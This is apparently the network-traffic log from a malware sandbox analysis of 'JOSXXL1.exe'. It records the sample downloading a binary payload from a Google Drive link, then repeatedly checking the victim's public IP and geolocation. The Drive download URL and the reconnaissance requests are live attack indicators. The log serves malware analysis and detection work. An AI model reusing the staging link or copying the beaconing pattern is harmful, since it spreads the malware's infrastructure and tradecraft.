Oct 26, 2024 23:57:18.523883104 CEST | 323 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:18 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: caf0531f442086a2cbf6c6367a2c93c8
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>
Oct 26, 2024 23:57:20.209976912 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
Oct 26, 2024 23:57:20.371098042 CEST | 323 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: b98f0aa4cab169088238d336be5cc52d
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 61908 | 193.122.130.0 | 80 | 3492 | C:\Users\user\Desktop\JOSXXL1.exe
Timestamp | Bytes transferred | Direction | Data
Oct 26, 2024 23:57:21.186281919 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
Oct 26, 2024 23:57:21.848947048 CEST | 323 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 80a85bcace7f28602421dbe53bb7312a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 61919 | 193.122.130.0 | 80 | 3492 | C:\Users\user\Desktop\JOSXXL1.exe
Timestamp | Bytes transferred | Direction | Data
Oct 26, 2024 23:57:22.639153004 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
Oct 26, 2024 23:57:23.311886072 CEST | 323 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:23 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 3771b7856e31be804c72bf989c764894
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 61927 | 193.122.130.0 | 80 | 3492 | C:\Users\user\Desktop\JOSXXL1.exe
Timestamp | Bytes transferred | Direction | Data
Oct 26, 2024 23:57:24.147428989 CEST | 151 | OUT | GET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
Oct 26, 2024 23:57:24.929389954 CEST | 323 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:24 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: daf86f86055975f57e58ea89aa4b0ebe
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 61939 | 193.122.130.0 | 80 | 3492 | C:\Users\user\Desktop\JOSXXL1.exe
Timestamp | Bytes transferred | Direction | Data
Oct 26, 2024 23:57:25.718627930 CEST | 151 | OUT | GET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
Oct 26, 2024 23:57:26.380525112 CEST | 323 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:26 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: e7450ed6ab6c6479b8473d41a51f385b
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 61950 | 193.122.130.0 | 80 | 3492 | C:\Users\user\Desktop\JOSXXL1.exe
Timestamp | Bytes transferred | Direction | Data
Oct 26, 2024 23:57:27.159492970 CEST | 151 | OUT | GET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
Oct 26, 2024 23:57:27.838432074 CEST | 323 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:27 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: e26ca40bd8a5ae27d24e236f222ca039
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 61958 | 193.122.130.0 | 80 | 3492 | C:\Users\user\Desktop\JOSXXL1.exe
Timestamp | Bytes transferred | Direction | Data
Oct 26, 2024 23:57:28.635612011 CEST | 151 | OUT | GET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
Oct 26, 2024 23:57:29.307995081 CEST | 323 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:29 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 0438c5c15c6bebe98b600e160ea76bca
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 61970 | 193.122.130.0 | 80 | 3492 | C:\Users\user\Desktop\JOSXXL1.exe
Timestamp | Bytes transferred | Direction | Data
Oct 26, 2024 23:57:30.098470926 CEST | 151 | OUT | GET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
Oct 26, 2024 23:57:30.792260885 CEST | 323 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:30 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 9629954719db26f968ddc2c33c9db823
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 61847 | 142.250.185.238 | 443 | 3492 | C:\Users\user\Desktop\JOSXXL1.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-26 21:57:11 UTC | 216 | OUT | GET /uc?export=download&id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2 HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
2024-10-26 21:57:11 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Sat, 26 Oct 2024 21:57:11 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Security-Policy: script-src 'nonce-O0TpBC-RwQLqnQBFKUsLLg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


Session ID: 1 | Source IP: 192.168.2.4 | Source Port: 61854 | Destination IP: 142.250.181.225 | Destination Port: 443 | PID: 3492 | Process: C:\Users\user\Desktop\JOSXXL1.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-26 21:57:12 UTC | 258 | OUT | GET /download?id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
2024-10-26 21:57:15 UTC | 4907 | IN | HTTP/1.1 200 OK
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Security-Policy: sandbox
                                                                                                      Content-Security-Policy: default-src 'none'
                                                                                                      Content-Security-Policy: frame-ancestors 'none'
                                                                                                      X-Content-Security-Policy: sandbox
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Cross-Origin-Embedder-Policy: require-corp
                                                                                                      Cross-Origin-Resource-Policy: same-site
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Disposition: attachment; filename="XADxc144.bin"
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Access-Control-Allow-Credentials: false
                                                                                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 275520
                                                                                                      Last-Modified: Wed, 23 Oct 2024 17:37:54 GMT
                                                                                                      X-GUploader-UploadID: AHmUCY35Inz-IHd0lpbVRmAq5usplkGviM_86Ze_nD1it84WHjZW2FPfGMmrhcEmHsRXSMhCGmk
                                                                                                      Date: Sat, 26 Oct 2024 21:57:14 GMT
                                                                                                      Expires: Sat, 26 Oct 2024 21:57:14 GMT
                                                                                                      Cache-Control: private, max-age=0
                                                                                                      X-Goog-Hash: crc32c=pJsuIw==
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


Session ID: 2 | Source IP: 192.168.2.4 | Source Port: 61896 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 3492 | Process: C:\Users\user\Desktop\JOSXXL1.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-26 21:57:19 UTC | 87 | OUT | GET /xml/173.254.250.68 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      Connection: Keep-Alive
2024-10-26 21:57:20 UTC | 881 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:19 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: MISS
                                                                                                      Last-Modified: Sat, 26 Oct 2024 21:57:19 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IQpqfqPOZ5gLAtm%2F0P6KIOAAo7wJUYQS2nSgEUOqeysHJaUByCmypxmR%2BvqM9nUEpZo95bXpsuPW8GNUikkz5MTEAB25sEX6WGX5Dxr22o41WJ0Ukvhcrc4jPynoQ9t3vC5yBGNP"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d8db38d69946bae-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1145&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2462585&cwnd=251&unsent_bytes=0&cid=05e91c15d89abf28&ts=462&x=0"
2024-10-26 21:57:20 UTC | 366 | IN | Data Ascii: 167<Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-26 21:57:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 61902 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 3492 | Process: C:\Users\user\Desktop\JOSXXL1.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-26 21:57:20 UTC | 63 | OUT | GET /xml/173.254.250.68 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
2024-10-26 21:57:21 UTC | 894 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:21 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 2
                                                                                                      Last-Modified: Sat, 26 Oct 2024 21:57:19 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2BuAGPRwN1ik%2BEoLXmjWp4mpJUTEcNRXiSJ%2FOhIfLtoGRSc1Tn59SZ4YO2ZleNcKsga%2FhNoCNjrQU2kRTOiYdGbfX4FazO2VCvLDGXjEqBXk2vLYzzJPu3g%2FxnNWF6e1VB81G9mx"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d8db3969e373abb-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1290&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2371826&cwnd=251&unsent_bytes=0&cid=e5e19ee2bfed5da7&ts=191&x=0"
2024-10-26 21:57:21 UTC | 366 | IN | Data Ascii: 167<Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-26 21:57:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 61913 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 3492 | Process: C:\Users\user\Desktop\JOSXXL1.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-26 21:57:22 UTC | 63 | OUT | GET /xml/173.254.250.68 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
2024-10-26 21:57:22 UTC | 890 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:22 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 3
                                                                                                      Last-Modified: Sat, 26 Oct 2024 21:57:19 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EHiisrZQgVARELdXGDRT1odpP9K7Ufl%2FjLrHU0pgXUYZSwCeBl%2Ft0qvciXYORTuCBJyTkKj%2B5UagQZw7camOSGHB6PjgcfSqGsyZX2r4ZUj0LB5UJw7OJsrbYxJi8MW4UvRl9w7N"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d8db39fea376bc6-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1145&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2468883&cwnd=241&unsent_bytes=0&cid=c2930f4a9242bc32&ts=155&x=0"
2024-10-26 21:57:22 UTC | 366 | IN | Data Ascii: 167<Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-26 21:57:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 61922 | 188.114.96.3 | 443 | 3492 | C:\Users\user\Desktop\JOSXXL1.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-26 21:57:23 UTC | 63 | OUT | GET /xml/173.254.250.68 HTTP/1.1
Host: reallyfreegeoip.org
2024-10-26 21:57:24 UTC | 890 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:24 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 5
                                                                                                      Last-Modified: Sat, 26 Oct 2024 21:57:19 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BUgV2WSq7XTq9Ru1FId0JZsooAkYxt4gywAkVWlzX3lVFWdTZ8WoRuUSbAJnTxk9%2FWvABPXYm1PUQ%2BTMnO7ALPocyBvIBHjorydTlcduwyrXbA6zGFsWk5f1Oa9UAVuyk3E2Yqlu"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d8db3a94ff46b52-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1048&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2686456&cwnd=223&unsent_bytes=0&cid=a24417429bdf0590&ts=204&x=0"
2024-10-26 21:57:24 UTC | 366 | IN | Data Ascii: 167<Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-26 21:57:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 61933 | 188.114.96.3 | 443 | 3492 | C:\Users\user\Desktop\JOSXXL1.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-26 21:57:25 UTC | 63 | OUT | GET /xml/173.254.250.68 HTTP/1.1
Host: reallyfreegeoip.org
2024-10-26 21:57:25 UTC | 892 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:25 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 6
                                                                                                      Last-Modified: Sat, 26 Oct 2024 21:57:19 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ZmY%2Fq3phhfLd3iEX%2FQ3VRW3z56U9%2BIaw93HSscBP%2Fwp3PGtnt6iaKw79WSvteVMeMigPnskuhh1bzpo7eDxtQ1nsqvd2BukQVVPq5gAzu8dKkUGtYyFKUn7bFAMBZkD9AUVpocX"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d8db3b32bfe474a-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1802&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1462626&cwnd=251&unsent_bytes=0&cid=7dcee111638c095a&ts=160&x=0"
2024-10-26 21:57:25 UTC | 366 | IN | Data Ascii: 167<Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-26 21:57:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 61945 | 188.114.96.3 | 443 | 3492 | C:\Users\user\Desktop\JOSXXL1.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-26 21:57:26 UTC | 63 | OUT | GET /xml/173.254.250.68 HTTP/1.1
Host: reallyfreegeoip.org
2024-10-26 21:57:27 UTC | 888 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:27 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 8
                                                                                                      Last-Modified: Sat, 26 Oct 2024 21:57:19 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FYZJ49z40VGCFyOs1bCoittTzoZC1BYyzyIoyugcueW%2B0xEKgLtHZl8doa1zBGdYhWRntpmdU7WDcYfbi1ehDqBYtRMukztaH5moB8GgotpJ0HEBggbmUQ82ZEzNyoB49HUJtMZr"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d8db3bc2f9e474e-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1164&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2354471&cwnd=244&unsent_bytes=0&cid=3882930602556f0c&ts=163&x=0"
2024-10-26 21:57:27 UTC | 366 | IN | Data Ascii: 167<Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-26 21:57:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 61952 | 188.114.96.3 | 443 | 3492 | C:\Users\user\Desktop\JOSXXL1.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-26 21:57:28 UTC | 87 | OUT | GET /xml/173.254.250.68 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-10-26 21:57:28 UTC | 888 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:28 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 9
                                                                                                      Last-Modified: Sat, 26 Oct 2024 21:57:19 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DsCNgvJwwU2YVGEwjqCkS1kOTAIX4o3pbzRynTRS2cxYoHDZCrVDhfJstUvI5ZV9aoLFNq%2Fn0Olq0i6tDOFxOPfeBk%2F3JXjDGFOUpaOrDIQpEX2NxywMKuA4vMHAlZx6lcw3FhJs"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d8db3c569e7476e-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1051&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2535901&cwnd=246&unsent_bytes=0&cid=2fbd20df5cde2216&ts=166&x=0"
2024-10-26 21:57:28 UTC | 366 | IN | Data Ascii: 167<Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-26 21:57:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 61964 | 188.114.96.3 | 443 | 3492 | C:\Users\user\Desktop\JOSXXL1.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-26 21:57:29 UTC | 87 | OUT | GET /xml/173.254.250.68 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
